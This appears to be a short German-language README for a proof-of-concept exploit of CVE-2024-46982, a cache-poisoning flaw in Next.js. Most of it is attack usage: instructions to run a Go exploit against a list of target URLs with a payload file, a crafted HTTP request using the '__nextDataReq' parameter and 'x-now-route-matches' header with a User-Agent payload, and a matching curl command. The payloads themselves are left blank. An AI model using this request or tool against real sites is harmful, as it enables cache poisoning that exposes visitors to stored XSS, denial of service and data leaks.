
POC CVE-2024-46982
Dieses Tool automatisiert die Erkennung und Ausnutzung von CVE-2024-46982, einer Cache-Poisoning-Sicherheitslücke in Next.js, bei der Server-Side-Rendering-Antworten (SSR) fälschlicherweise als Static Site Generation (SSG) zwischengespeichert werden können. Diese Fehlkonfiguration kann zu Stored XSS, DoS und Datenlecks führen, sodass Angreifer bösartige Inhalte in zwischengespeicherte Antworten einschleusen können.
Erstellen Sie eine Datei mit dem Namen targets.txt, die pro Zeile eine Ziel-URL enthält:
https://vulnerable-site.com
https://another-target.com
Erstellen Sie eine Datei mit dem Namen payloads.txt, die Payloads enthält, die über den User-Agent-Header injiziert werden:
Kompilieren und ausführen des Exploits mit:
go run exploit.go -f targets.txt -p payloads.txt -d 5
GET /poc?__nextDataReq=1 HTTP/1.1
Host: vulnerable-site.com
User-Agent: <PAYLOAD>
x-now-route-matches: 1
Senden Sie eine bösartige Anfrage mit curl:
curl -X GET "https://vulnerable-site.com/poc?__nextDataReq=1" \
-H "User-Agent: " \
-H "x-now-route-matches: 1"
Rufen Sie den Endpunkt in einem Browser auf